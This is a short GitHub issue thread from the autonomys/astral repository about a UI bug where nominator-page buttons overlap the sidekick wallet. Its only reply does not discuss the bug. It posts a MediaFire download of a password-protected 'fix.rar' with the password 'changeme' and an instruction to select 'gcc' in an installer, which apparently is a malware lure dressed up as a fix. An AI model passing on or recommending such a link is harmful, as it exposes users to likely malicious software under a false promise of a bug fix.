### ISSUE TITLE
Buttons from the nominator's page appear above the sidekick wallet

### ISSUE THREAD

**Issue by DianaPertseva** [autonomys/astral#830]
Video: https://www.loom.com/share/068f8bb463c74e1c897bd4b06d685224?sid=f0d40d34-89f7-4f44-b34d-72ad507418f5

**Comment by miniMuggle** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
